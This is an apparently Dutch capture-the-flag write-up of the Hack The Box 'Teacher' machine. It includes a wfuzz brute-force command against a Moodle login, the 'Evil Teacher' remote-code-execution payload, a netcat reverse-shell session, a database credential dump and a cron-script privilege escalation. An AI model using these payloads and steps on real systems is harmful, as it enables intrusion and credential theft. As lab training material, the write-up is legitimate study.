Zoals altijd beginnen we met een nmap scan
vervolgens gaan we naar de website
We kunnen zien dat een nieuw portaal open is voor docenten en studenten
klik op andere links, het brengt ons naar de galerij
Stap 2: Dirbuster uitvoeren
blader door de link / afbeeldingen
we kwamen erachter dat de afbeelding 5.png enkele fouten bevat
mogelijk wachtwoord: Th4CoolTheacha
Gebruikersnaam: Giovanni
We weten ook dat CMS moodle op de webserver wordt uitgevoerd
gebruik crunch om een wachtwoordenlijstbestand te genereren
genereer een lengte = 15 wachtwoordenbestanden en probeer te bruteforcen
wfuzz -w wachtwoord.txt -L -d “username = Giovanni & password = FUZZ” – hw 1224 http://10.10.10.153/moodle/login/index.php
Het paswoord is : Th4C00lTheacha#
log in moodle
En we hebben ons op het dashboard aangemeld als Giovanni
Google moodle exploit en ontdekte de “EVIL TEACHER” exploit voor het op afstand uitvoeren van code
https://blog.ripstech.com/2018/moodle-remote-code-execution/
add a quiz
add some questions
add the successful payload /*{a*/`$_GET[0]`;//{x}}
url decode and modify the code to make it be remote code executable
and here we got a reverse shell back with netcat
root@kali:~/htb# rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.16.70] from (UNKNOWN) [10.10.10.153] 34996 id uid=33(www-data) gid=33(www-data) groups=33(www-data) python -c 'import pty; pty.spawn("/bin/bash")' www-data@teacher:/var/www/html/moodle/question$
ga naar de moodle-database, het config.php-bestand bevat het databasewachtwoord
voor mysql
log in de database
SELECT * from mdl_user\G
we vinden een paswoordhash voor giovannibak
google de md5 hash en decrypted het als expelled
pak de user vlag
in de /tmp directory zien we course backup zip bestand
uit het backup.sh-script dat we hebben gevonden in / usr / bin
dit vertelt ons
ga naar home directory / home / giovanni / work
maak een archief met de inhoud van de map met cursussen
blader naar / tmp
geef lees- en schrijfrechten aan iedereen in de map / home / giovanni / work / tmp en submappen
script kan worden gebruikt om de inhoud van de te halen
/ root-map en verkrijg de root-vlag. cursusbestand kan worden hernoemd
dus kunnen we root.txt met het script extraheren
Auteur : Jacco Straathof